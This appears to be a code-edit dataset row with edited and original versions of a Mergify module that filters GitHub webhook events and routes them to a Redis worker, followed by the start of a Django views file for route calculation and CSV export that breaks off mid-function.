edited_code stringlengths 17 978k | original_code stringlengths 17 978k |
|---|---|
# -*- encoding: utf-8 -*-
#
# Copyright © 2020 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import dataclasses
import typing
import daiquiri
from datadog import statsd
from mergify_engine import check_api
from mergify_engine import config
from mergify_engine import context
from mergify_engine import engine
from mergify_engine import exceptions
from mergify_engine import github_types
from mergify_engine import utils
from mergify_engine import worker
from mergify_engine.engine import commands_runner
LOG = daiquiri.getLogger(__name__)
def meter_event(
    event_type: github_types.GitHubEventType, event: github_types.GitHubEvent
) -> None:
    """Emit a statsd counter for one incoming GitHub webhook event.

    The metric is tagged with the event type and, for pull_request
    events, with the action and whether the merge was performed by the
    Mergify bot account.
    """
    tags = [f"event_type:{event_type}"]
    if event_type == "pull_request":
        event = typing.cast(github_types.GitHubEventPullRequest, event)
        # Single quotes inside the f-string: reusing double quotes here
        # is a SyntaxError on every Python version before 3.12.
        tags.append(f"action:{event['action']}")
        if event["action"] == "closed" and event["pull_request"]["merged"]:
            if (
                event["pull_request"]["merged_by"] is not None
                and event["pull_request"]["merged_by"]["login"] == config.BOT_USER_LOGIN
            ):
                tags.append("by_mergify")
    statsd.increment("github.events", tags=tags)
def _extract_slim_event(event_type, data):
    """Build a trimmed copy of a webhook payload keeping only the fields
    the worker needs to route the event to the right pull request."""
    slim = {"sender": data["sender"]}
    if event_type == "status":
        # PR is resolved from the commit sha.
        slim["sha"] = data["sha"]
    elif event_type == "refresh":
        # PR is resolved from the sha or the branch name.
        slim["action"] = data["action"]
        slim["ref"] = data["ref"]
    elif event_type == "push":
        # PR is resolved from the sha.
        for key in ("ref", "before", "after", "pusher"):
            slim[key] = data[key]
    elif event_type in ("check_suite", "check_run"):
        # PR is resolved from the sha; keep only the minimal shape of the
        # nested check payload.
        payload = data[event_type]
        slim["action"] = data["action"]
        slim["app"] = {"id": payload["app"]["id"]}
        slim[event_type] = {
            "head_sha": payload["head_sha"],
            "pull_requests": [
                {
                    "number": pr["number"],
                    "base": {"repo": {"url": pr["base"]["repo"]["url"]}},
                }
                for pr in payload["pull_requests"]
            ],
        }
    elif event_type == "pull_request":
        # Covers pull_request opened/synchronize/closed.
        slim["action"] = data["action"]
    elif event_type == "issue_comment":
        # The commands runner needs the comment itself.
        slim["comment"] = data["comment"]
    return slim
@dataclasses.dataclass
class IgnoredEvent(Exception):
    """Raised when an event is ignored."""

    # GitHub event type (e.g. "pull_request", "push").
    event_type: str
    # Delivery identifier of the webhook event.
    event_id: str
    # Human-readable explanation of why the event was dropped.
    reason: str
def _log_on_exception(exc: Exception, msg: str) -> None:
    """Log *msg* with *exc* attached, demoting expected errors.

    Exceptions that the engine deliberately ignores or retries are only
    worth a debug line; anything else is a real error.
    """
    expected = exceptions.should_be_ignored(exc) or exceptions.need_retry(exc)
    logger = LOG.debug if expected else LOG.error
    logger(msg, exc_info=exc)
async def filter_and_dispatch(
    redis_cache: utils.RedisCache,
    redis_stream: utils.RedisStream,
    event_type: github_types.GitHubEventType,
    event_id: str,
    event: github_types.GitHubEvent,
) -> None:
    """Filter an incoming GitHub webhook event and dispatch it to the worker.

    Relevant events are trimmed down (see _extract_slim_event) and pushed
    onto the Redis worker stream. Irrelevant ones — archived repositories,
    Mergify's own check events, pure cache-maintenance events, unknown
    event types — are logged and reported by raising IgnoredEvent.

    Raises:
        IgnoredEvent: when the event is not forwarded to the worker.
    """
    # TODO(sileht): is statsd async ?
    meter_event(event_type, event)
    pull_number = None
    ignore_reason = None
    if event_type == "pull_request":
        event = typing.cast(github_types.GitHubEventPullRequest, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        pull_number = event["pull_request"]["number"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif event["action"] in ("opened", "synchronize"):
            try:
                await engine.create_initial_summary(redis_cache, event)
            except Exception as e:
                _log_on_exception(e, "fail to create initial summary")
    elif event_type == "refresh":
        event = typing.cast(github_types.GitHubEventRefresh, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["pull_request_number"] is not None:
            pull_number = event["pull_request_number"]
    elif event_type == "pull_request_review_comment":
        event = typing.cast(github_types.GitHubEventPullRequestReviewComment, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        pull_number = event["pull_request"]["number"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
    elif event_type == "pull_request_review":
        event = typing.cast(github_types.GitHubEventPullRequestReview, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        pull_number = event["pull_request"]["number"]
    elif event_type == "issue_comment":
        event = typing.cast(github_types.GitHubEventIssueComment, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        pull_number = github_types.GitHubPullRequestNumber(event["issue"]["number"])
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif "pull_request" not in event["issue"]:
            ignore_reason = "comment is not on a pull request"
        elif event["action"] != "created":
            # NOTE: single quotes inside the f-string — reusing double
            # quotes is a SyntaxError before Python 3.12.
            ignore_reason = f"comment has been {event['action']}"
        elif (
            "@mergify " not in event["comment"]["body"].lower()
            and "@mergifyio " not in event["comment"]["body"].lower()
        ):
            ignore_reason = "comment is not for Mergify"
        else:
            # NOTE(sileht): nothing important should happen in this hook as we don't retry it
            try:
                await commands_runner.on_each_event(event)
            except Exception as e:
                _log_on_exception(e, "commands_runner.on_each_event failed")
    elif event_type == "status":
        event = typing.cast(github_types.GitHubEventStatus, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
    elif event_type == "push":
        event = typing.cast(github_types.GitHubEventPush, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif not event["ref"].startswith("refs/heads/"):
            ignore_reason = f"push on {event['ref']}"
        # NOTE(review): duplicate of the first check in this branch and
        # therefore unreachable — confirm whether it can be removed.
        elif event["repository"]["archived"]:  # pragma: no cover
            ignore_reason = "repository archived"
    elif event_type == "check_suite":
        event = typing.cast(github_types.GitHubEventCheckSuite, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif event["action"] != "rerequested":
            ignore_reason = f"check_suite/{event['action']}"
        # NOTE(review): this branch can never match — the previous branch
        # already filtered out every action != "rerequested", so the
        # `and event["action"] != "rerequested"` term is always False
        # here. Confirm the intended condition.
        elif (
            event[event_type]["app"]["id"] == config.INTEGRATION_ID
            and event["action"] != "rerequested"
            and event[event_type].get("external_id") != check_api.USER_CREATED_CHECKS
        ):
            ignore_reason = f"mergify {event_type}"
    elif event_type == "check_run":
        event = typing.cast(github_types.GitHubEventCheckRun, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif (
            event[event_type]["app"]["id"] == config.INTEGRATION_ID
            and event["action"] != "rerequested"
            and event[event_type].get("external_id") != check_api.USER_CREATED_CHECKS
        ):
            ignore_reason = f"mergify {event_type}"
    elif event_type == "organization":
        event = typing.cast(github_types.GitHubEventOrganization, event)
        owner_login = event["organization"]["login"]
        owner_id = event["organization"]["id"]
        repo_name = None
        ignore_reason = "organization event"
        if event["action"] == "deleted":
            await context.Installation.clear_team_members_cache_for_org(
                redis_cache, event["organization"]
            )
        if event["action"] in ("deleted", "member_added", "member_removed"):
            await context.Repository.clear_user_permission_cache_for_org(
                redis_cache, event["organization"]
            )
    elif event_type == "member":
        event = typing.cast(github_types.GitHubEventMember, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        ignore_reason = "member event"
        await context.Repository.clear_user_permission_cache_for_user(
            redis_cache,
            event["repository"]["owner"],
            event["repository"],
            event["member"],
        )
    elif event_type == "membership":
        event = typing.cast(github_types.GitHubEventMembership, event)
        owner_login = event["organization"]["login"]
        owner_id = event["organization"]["id"]
        repo_name = None
        ignore_reason = "membership event"
        if "slug" in event["team"]:
            await context.Installation.clear_team_members_cache_for_team(
                redis_cache, event["organization"], event["team"]["slug"]
            )
        else:
            # Deleted team
            await context.Installation.clear_team_members_cache_for_org(
                redis_cache,
                event["organization"],
            )
        await context.Repository.clear_user_permission_cache_for_org(
            redis_cache, event["organization"]
        )
    elif event_type == "team":
        event = typing.cast(github_types.GitHubEventTeam, event)
        owner_login = event["organization"]["login"]
        owner_id = event["organization"]["id"]
        repo_name = None
        ignore_reason = "team event"
        if event["action"] in ("edited", "deleted"):
            await context.Installation.clear_team_members_cache_for_team(
                redis_cache, event["organization"], event["team"]["slug"]
            )
        if event["action"] in (
            "edited",
            "added_to_repository",
            "removed_from_repository",
            "deleted",
        ):
            if "repository" in event:
                await context.Repository.clear_user_permission_cache_for_repo(
                    redis_cache, event["organization"], event["repository"]
                )
            else:
                await context.Repository.clear_user_permission_cache_for_org(
                    redis_cache, event["organization"]
                )
    elif event_type == "team_add":
        event = typing.cast(github_types.GitHubEventTeamAdd, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        ignore_reason = "team_add event"
        await context.Repository.clear_user_permission_cache_for_repo(
            redis_cache, event["repository"]["owner"], event["repository"]
        )
    else:
        owner_login = "<unknown>"
        owner_id = "<unknown>"
        repo_name = "<unknown>"
        ignore_reason = "unexpected event_type"
    if ignore_reason is None:
        msg_action = "pushed to worker"
        slim_event = _extract_slim_event(event_type, event)
        await worker.push(
            redis_stream,
            owner_id,
            owner_login,
            repo_name,
            pull_number,
            event_type,
            slim_event,
        )
    else:
        msg_action = f"ignored: {ignore_reason}"
    LOG.info(
        "GithubApp event %s",
        msg_action,
        event_type=event_type,
        event_id=event_id,
        sender=event["sender"]["login"],
        gh_owner=owner_login,
        gh_repo=repo_name,
    )
    if ignore_reason:
        raise IgnoredEvent(event_type, event_id, ignore_reason)
# Lifetime (in seconds) of the Redis cache entries mapping a commit sha
# to its pull request number.
SHA_EXPIRATION = 60
async def _get_github_pulls_from_sha(
    installation: context.Installation,
    repo_name: github_types.GitHubRepositoryName,
    sha: github_types.SHAType,
    pulls: typing.List[github_types.GitHubPullRequest],
) -> typing.List[github_types.GitHubPullRequestNumber]:
    """Return the number of the pull request whose head commit is *sha*.

    The sha -> number mapping is cached in Redis for SHA_EXPIRATION
    seconds. An empty list is returned when no pull request in *pulls*
    matches.
    """
    cache_key = f"sha~{installation.owner_login}~{repo_name}~{sha}"
    cached = await installation.redis.get(cache_key)
    if cached is not None:
        return [github_types.GitHubPullRequestNumber(int(cached))]
    matching = [p for p in pulls if p["head"]["sha"] == sha]
    if not matching:
        return []
    found = matching[0]
    await installation.redis.set(cache_key, found["number"], ex=SHA_EXPIRATION)
    return [found["number"]]
async def extract_pull_numbers_from_event(
    installation: context.Installation,
    repo_name: github_types.GitHubRepositoryName,
    event_type: github_types.GitHubEventType,
    data: github_types.GitHubEvent,
    opened_pulls: typing.List[github_types.GitHubPullRequest],
) -> typing.List[github_types.GitHubPullRequestNumber]:
    """Return the pull request numbers an incoming event applies to.

    Depending on the event type, the numbers are resolved from the
    payload itself, from the branch name, or from the head commit sha
    matched against *opened_pulls*. Unknown event types yield an empty
    list.
    """
    # NOTE(sileht): Don't fail if we received an event on a repo that doesn't exist anymore
    if event_type == "refresh":
        data = typing.cast(github_types.GitHubEventRefresh, data)
        if (pull_request_number := data.get("pull_request_number")) is not None:
            return [pull_request_number]
        if (ref := data.get("ref")) is None:
            # No target at all: refresh every opened pull request.
            return [p["number"] for p in opened_pulls]
        branch = ref[len("refs/heads/") :]
        return [p["number"] for p in opened_pulls if p["base"]["ref"] == branch]
    elif event_type == "push":
        data = typing.cast(github_types.GitHubEventPush, data)
        branch = data["ref"][len("refs/heads/") :]
        return [p["number"] for p in opened_pulls if p["base"]["ref"] == branch]
    elif event_type == "status":
        data = typing.cast(github_types.GitHubEventStatus, data)
        return await _get_github_pulls_from_sha(
            installation, repo_name, data["sha"], opened_pulls
        )
    elif event_type in ("check_suite", "check_run"):
        # Both payloads have the same shape, so the two previously
        # duplicated branches are handled together.
        # NOTE(sileht): This list may contain pull requests from another
        # org/user fork; keep only the ones targeting our repository.
        base_repo_url = (
            f"{config.GITHUB_API_URL}/repos/{installation.owner_login}/{repo_name}"
        )
        pulls = [
            p["number"]
            for p in data[event_type]["pull_requests"]
            if p["base"]["repo"]["url"] == base_repo_url
        ]
        if not pulls:
            # Fall back to resolving the head sha against the opened PRs.
            pulls = await _get_github_pulls_from_sha(
                installation, repo_name, data[event_type]["head_sha"], opened_pulls
            )
        return pulls
    else:
        return []
| # -*- encoding: utf-8 -*-
#
# Copyright © 2020 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import dataclasses
import typing
import daiquiri
from datadog import statsd
from mergify_engine import check_api
from mergify_engine import config
from mergify_engine import context
from mergify_engine import engine
from mergify_engine import exceptions
from mergify_engine import github_types
from mergify_engine import utils
from mergify_engine import worker
from mergify_engine.engine import commands_runner
LOG = daiquiri.getLogger(__name__)
def meter_event(
    event_type: github_types.GitHubEventType, event: github_types.GitHubEvent
) -> None:
    """Emit a statsd counter for one incoming GitHub webhook event.

    Tags the metric with the event type and, for pull_request events,
    with the action and whether the merge was done by the Mergify bot.
    """
    tags = [f"event_type:{event_type}"]
    if event_type == "pull_request":
        event = typing.cast(github_types.GitHubEventPullRequest, event)
        tags.append(f"action:{event['action']}")
        merged_by = (
            event["pull_request"]["merged_by"]
            if event["action"] == "closed" and event["pull_request"]["merged"]
            else None
        )
        if merged_by is not None and merged_by["login"] == config.BOT_USER_LOGIN:
            tags.append("by_mergify")
    statsd.increment("github.events", tags=tags)
def _extract_slim_event(event_type, data):
    """Build a trimmed copy of a webhook payload keeping only the fields
    the worker needs to route the event to the right pull request."""
    slim = {"sender": data["sender"]}
    if event_type == "status":
        # PR is resolved from the commit sha.
        slim["sha"] = data["sha"]
    elif event_type == "refresh":
        # PR is resolved from the sha or the branch name.
        slim["action"] = data["action"]
        slim["ref"] = data["ref"]
    elif event_type == "push":
        # PR is resolved from the sha.
        for key in ("ref", "before", "after", "pusher"):
            slim[key] = data[key]
    elif event_type in ("check_suite", "check_run"):
        # PR is resolved from the sha; keep only the minimal shape of the
        # nested check payload.
        payload = data[event_type]
        slim["action"] = data["action"]
        slim["app"] = {"id": payload["app"]["id"]}
        slim[event_type] = {
            "head_sha": payload["head_sha"],
            "pull_requests": [
                {
                    "number": pr["number"],
                    "base": {"repo": {"url": pr["base"]["repo"]["url"]}},
                }
                for pr in payload["pull_requests"]
            ],
        }
    elif event_type == "pull_request":
        # Covers pull_request opened/synchronize/closed.
        slim["action"] = data["action"]
    elif event_type == "issue_comment":
        # The commands runner needs the comment itself.
        slim["comment"] = data["comment"]
    return slim
@dataclasses.dataclass
class IgnoredEvent(Exception):
    """Raised when an event is ignored."""

    # GitHub event type (e.g. "pull_request", "push").
    event_type: str
    # Delivery identifier of the webhook event.
    event_id: str
    # Human-readable explanation of why the event was dropped.
    reason: str
def _log_on_exception(exc: Exception, msg: str) -> None:
    """Log *msg* with *exc* attached, demoting expected errors.

    Exceptions that the engine deliberately ignores or retries are only
    worth a debug line; anything else is a real error.
    """
    expected = exceptions.should_be_ignored(exc) or exceptions.need_retry(exc)
    logger = LOG.debug if expected else LOG.error
    logger(msg, exc_info=exc)
async def filter_and_dispatch(
    redis_cache: utils.RedisCache,
    redis_stream: utils.RedisStream,
    event_type: github_types.GitHubEventType,
    event_id: str,
    event: github_types.GitHubEvent,
) -> None:
    """Filter an incoming GitHub webhook event and dispatch it to the worker.

    Relevant events are trimmed down (see _extract_slim_event) and pushed
    onto the Redis worker stream. Irrelevant ones — archived repositories,
    Mergify's own check events, pure cache-maintenance events, unknown
    event types — are logged and reported by raising IgnoredEvent.

    Raises:
        IgnoredEvent: when the event is not forwarded to the worker.
    """
    # TODO(sileht): is statsd async ?
    meter_event(event_type, event)
    pull_number = None
    ignore_reason = None
    if event_type == "pull_request":
        event = typing.cast(github_types.GitHubEventPullRequest, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        pull_number = event["pull_request"]["number"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif event["action"] in ("opened", "synchronize"):
            try:
                await engine.create_initial_summary(redis_cache, event)
            except Exception as e:
                _log_on_exception(e, "fail to create initial summary")
    elif event_type == "refresh":
        event = typing.cast(github_types.GitHubEventRefresh, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["pull_request_number"] is not None:
            pull_number = event["pull_request_number"]
    elif event_type == "pull_request_review_comment":
        event = typing.cast(github_types.GitHubEventPullRequestReviewComment, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        pull_number = event["pull_request"]["number"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
    elif event_type == "pull_request_review":
        event = typing.cast(github_types.GitHubEventPullRequestReview, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        pull_number = event["pull_request"]["number"]
    elif event_type == "issue_comment":
        event = typing.cast(github_types.GitHubEventIssueComment, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        pull_number = github_types.GitHubPullRequestNumber(event["issue"]["number"])
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif "pull_request" not in event["issue"]:
            ignore_reason = "comment is not on a pull request"
        elif event["action"] != "created":
            ignore_reason = f"comment has been {event['action']}"
        elif (
            "@mergify " not in event["comment"]["body"].lower()
            and "@mergifyio " not in event["comment"]["body"].lower()
        ):
            ignore_reason = "comment is not for Mergify"
        else:
            # NOTE(sileht): nothing important should happen in this hook as we don't retry it
            try:
                await commands_runner.on_each_event(event)
            except Exception as e:
                _log_on_exception(e, "commands_runner.on_each_event failed")
    elif event_type == "status":
        event = typing.cast(github_types.GitHubEventStatus, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
    elif event_type == "push":
        event = typing.cast(github_types.GitHubEventPush, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif not event["ref"].startswith("refs/heads/"):
            ignore_reason = f"push on {event['ref']}"
        # NOTE(review): duplicate of the first check in this branch and
        # therefore unreachable — confirm whether it can be removed.
        elif event["repository"]["archived"]:  # pragma: no cover
            ignore_reason = "repository archived"
    elif event_type == "check_suite":
        event = typing.cast(github_types.GitHubEventCheckSuite, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif event["action"] != "rerequested":
            ignore_reason = f"check_suite/{event['action']}"
        # NOTE(review): this branch can never match — the previous branch
        # already filtered out every action != "rerequested", so the
        # `and event["action"] != "rerequested"` term is always False
        # here. Confirm the intended condition.
        elif (
            event[event_type]["app"]["id"] == config.INTEGRATION_ID
            and event["action"] != "rerequested"
            and event[event_type].get("external_id") != check_api.USER_CREATED_CHECKS
        ):
            ignore_reason = f"mergify {event_type}"
    elif event_type == "check_run":
        event = typing.cast(github_types.GitHubEventCheckRun, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        if event["repository"]["archived"]:
            ignore_reason = "repository archived"
        elif (
            event[event_type]["app"]["id"] == config.INTEGRATION_ID
            and event["action"] != "rerequested"
            and event[event_type].get("external_id") != check_api.USER_CREATED_CHECKS
        ):
            ignore_reason = f"mergify {event_type}"
    elif event_type == "organization":
        event = typing.cast(github_types.GitHubEventOrganization, event)
        owner_login = event["organization"]["login"]
        owner_id = event["organization"]["id"]
        repo_name = None
        ignore_reason = "organization event"
        if event["action"] == "deleted":
            await context.Installation.clear_team_members_cache_for_org(
                redis_cache, event["organization"]
            )
        if event["action"] in ("deleted", "member_added", "member_removed"):
            await context.Repository.clear_user_permission_cache_for_org(
                redis_cache, event["organization"]
            )
    elif event_type == "member":
        event = typing.cast(github_types.GitHubEventMember, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        ignore_reason = "member event"
        await context.Repository.clear_user_permission_cache_for_user(
            redis_cache,
            event["repository"]["owner"],
            event["repository"],
            event["member"],
        )
    elif event_type == "membership":
        event = typing.cast(github_types.GitHubEventMembership, event)
        owner_login = event["organization"]["login"]
        owner_id = event["organization"]["id"]
        repo_name = None
        ignore_reason = "membership event"
        if "slug" in event["team"]:
            await context.Installation.clear_team_members_cache_for_team(
                redis_cache, event["organization"], event["team"]["slug"]
            )
        else:
            # Deleted team
            await context.Installation.clear_team_members_cache_for_org(
                redis_cache,
                event["organization"],
            )
        await context.Repository.clear_user_permission_cache_for_org(
            redis_cache, event["organization"]
        )
    elif event_type == "team":
        event = typing.cast(github_types.GitHubEventTeam, event)
        owner_login = event["organization"]["login"]
        owner_id = event["organization"]["id"]
        repo_name = None
        ignore_reason = "team event"
        if event["action"] in ("edited", "deleted"):
            await context.Installation.clear_team_members_cache_for_team(
                redis_cache, event["organization"], event["team"]["slug"]
            )
        if event["action"] in (
            "edited",
            "added_to_repository",
            "removed_from_repository",
            "deleted",
        ):
            if "repository" in event:
                await context.Repository.clear_user_permission_cache_for_repo(
                    redis_cache, event["organization"], event["repository"]
                )
            else:
                await context.Repository.clear_user_permission_cache_for_org(
                    redis_cache, event["organization"]
                )
    elif event_type == "team_add":
        event = typing.cast(github_types.GitHubEventTeamAdd, event)
        owner_login = event["repository"]["owner"]["login"]
        owner_id = event["repository"]["owner"]["id"]
        repo_name = event["repository"]["name"]
        ignore_reason = "team_add event"
        await context.Repository.clear_user_permission_cache_for_repo(
            redis_cache, event["repository"]["owner"], event["repository"]
        )
    else:
        owner_login = "<unknown>"
        owner_id = "<unknown>"
        repo_name = "<unknown>"
        ignore_reason = "unexpected event_type"
    if ignore_reason is None:
        msg_action = "pushed to worker"
        slim_event = _extract_slim_event(event_type, event)
        await worker.push(
            redis_stream,
            owner_id,
            owner_login,
            repo_name,
            pull_number,
            event_type,
            slim_event,
        )
    else:
        msg_action = f"ignored: {ignore_reason}"
    LOG.info(
        "GithubApp event %s",
        msg_action,
        event_type=event_type,
        event_id=event_id,
        sender=event["sender"]["login"],
        gh_owner=owner_login,
        gh_repo=repo_name,
    )
    if ignore_reason:
        raise IgnoredEvent(event_type, event_id, ignore_reason)
# Lifetime (in seconds) of the Redis cache entries mapping a commit sha
# to its pull request number.
SHA_EXPIRATION = 60
async def _get_github_pulls_from_sha(
    installation: context.Installation,
    repo_name: github_types.GitHubRepositoryName,
    sha: github_types.SHAType,
    pulls: typing.List[github_types.GitHubPullRequest],
) -> typing.List[github_types.GitHubPullRequestNumber]:
    """Return the number of the pull request whose head commit is *sha*.

    The sha -> number mapping is cached in Redis for SHA_EXPIRATION
    seconds. An empty list is returned when no pull request in *pulls*
    matches.
    """
    cache_key = f"sha~{installation.owner_login}~{repo_name}~{sha}"
    cached = await installation.redis.get(cache_key)
    if cached is not None:
        return [github_types.GitHubPullRequestNumber(int(cached))]
    matching = [p for p in pulls if p["head"]["sha"] == sha]
    if not matching:
        return []
    found = matching[0]
    await installation.redis.set(cache_key, found["number"], ex=SHA_EXPIRATION)
    return [found["number"]]
async def extract_pull_numbers_from_event(
    installation: context.Installation,
    repo_name: github_types.GitHubRepositoryName,
    event_type: github_types.GitHubEventType,
    data: github_types.GitHubEvent,
    opened_pulls: typing.List[github_types.GitHubPullRequest],
) -> typing.List[github_types.GitHubPullRequestNumber]:
    """Return the pull request numbers an incoming event applies to.

    Depending on the event type, the numbers are resolved from the
    payload itself, from the branch name, or from the head commit sha
    matched against *opened_pulls*. Unknown event types yield an empty
    list.
    """
    # NOTE(sileht): Don't fail if we received an event on a repo that doesn't exist anymore
    if event_type == "refresh":
        data = typing.cast(github_types.GitHubEventRefresh, data)
        if (pull_request_number := data.get("pull_request_number")) is not None:
            return [pull_request_number]
        if (ref := data.get("ref")) is None:
            # No target at all: refresh every opened pull request.
            return [p["number"] for p in opened_pulls]
        branch = ref[len("refs/heads/") :]
        return [p["number"] for p in opened_pulls if p["base"]["ref"] == branch]
    elif event_type == "push":
        data = typing.cast(github_types.GitHubEventPush, data)
        branch = data["ref"][len("refs/heads/") :]
        return [p["number"] for p in opened_pulls if p["base"]["ref"] == branch]
    elif event_type == "status":
        data = typing.cast(github_types.GitHubEventStatus, data)
        return await _get_github_pulls_from_sha(
            installation, repo_name, data["sha"], opened_pulls
        )
    elif event_type in ("check_suite", "check_run"):
        # Both payloads have the same shape, so the two previously
        # duplicated branches are handled together.
        # NOTE(sileht): This list may contain pull requests from another
        # org/user fork; keep only the ones targeting our repository.
        base_repo_url = (
            f"{config.GITHUB_API_URL}/repos/{installation.owner_login}/{repo_name}"
        )
        pulls = [
            p["number"]
            for p in data[event_type]["pull_requests"]
            if p["base"]["repo"]["url"] == base_repo_url
        ]
        if not pulls:
            # Fall back to resolving the head sha against the opened PRs.
            pulls = await _get_github_pulls_from_sha(
                installation, repo_name, data[event_type]["head_sha"], opened_pulls
            )
        return pulls
    else:
        return []
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth.forms import AuthenticationForm
from .forms import *
from django.contrib.auth import login, logout, authenticate
from django.contrib import messages
from django.apps import apps
from django.conf import settings
from django.core.paginator import Paginator
import json
import operator
from django.db.models import Q
from .route import RouteCalc, format_to_time, format_to_km, output_result_db_to_csv, format_to_duration
import os
import copy
# #Главная
# def homepage(request):
# #return HttpResponse("Test response")
# return render(request=request,
# template_name='main/home.html',
# context={'AccLogs': AccessLog.objects.all()}
# )
# Ajax request returning the list of stores with their codes.
def ajax_getStores(request):
    """Autocomplete endpoint: return up to five stores whose name or NS
    code contains the 'term' query parameter, as a JSON object whose
    keys are "<ns_code> <name>" strings."""
    results = {}
    # NOTE(review): request.is_ajax() is deprecated since Django 3.1 and
    # removed in 4.0 — confirm the project's Django version.
    if request.is_ajax():
        term = request.GET.get('term', '')
        if not term:
            # NOTE(review): preserves the original behaviour of serving
            # JSON "null" when no search term is supplied.
            results = None
        else:
            matches = Store.objects.filter(
                Q(name__icontains=term) | Q(ns_code__icontains=term)
            )[:5]
            results = {f"{store.ns_code} {store.name}": '' for store in matches}
    return HttpResponse(json.dumps(results), 'application/json')
# Save a route to a downloadable file.
def saveroute_request(route_set, file_format):
    """Export *route_set* as a downloadable file.

    Only the CSV format is supported; any other format redirects to the
    homepage. The temporary file produced by the exporter is always
    removed, even if building the response fails.
    """
    if file_format != 'csv':
        return redirect("main:homepage")
    filepath = output_result_db_to_csv(route_set)
    try:
        # Context manager guarantees the handle is closed even if the
        # read fails; the original open()/close() pair leaked it on error.
        with open(filepath, "rb") as csv_file:
            response = HttpResponse(csv_file.read(), content_type='text/csv')
    finally:
        os.remove(filepath)
    response['Content-Disposition'] = f'attachment; filename="{route_set.get_short_desc()}.csv"'
    return response
#Просмотр маршрута
def viewroute_request(request):
# if not request.user.is_authenticated:
# return redirect("main:login")
try:
calc_id = int(request.GET.get('id', ''))
gr_variant = int(request.GET.get('gr', 0))
reis_variant = int(request.GET.get('reis', 0))
save_request = request.GET.get('save', '')
route_set = RouteSet.objects.get(id=calc_id)
route_stat = RouteStat.objects.get(route_set=route_set)
except:
messages.error(request, "Неверная ссылка на расчет!")
return redirect("main:homepage")
if not route_stat.reis_count: # Пустой расчет
return render(
request,
'main/message.html',
context={'page_title': 'Пустой расчет',
'msg_title': 'Пустой расчет',
'msg_body': '<h5><p>Расчет не удался.<br>' +
'Попробуйте указать менее строгие параметры расчета</p></h5>' +
f'<p>{route_set}</p>',
})
def in_dictlist(val, dict):
for key, dval in dict:
if key == val: return True
return False
if save_request:
return saveroute_request(route_set, save_request)
#список графиков для комбобокса
route_list = Route.objects.filter(route_set=route_set)
gr_list = []
for graph in route_list.values_list('graph', flat=True).distinct():
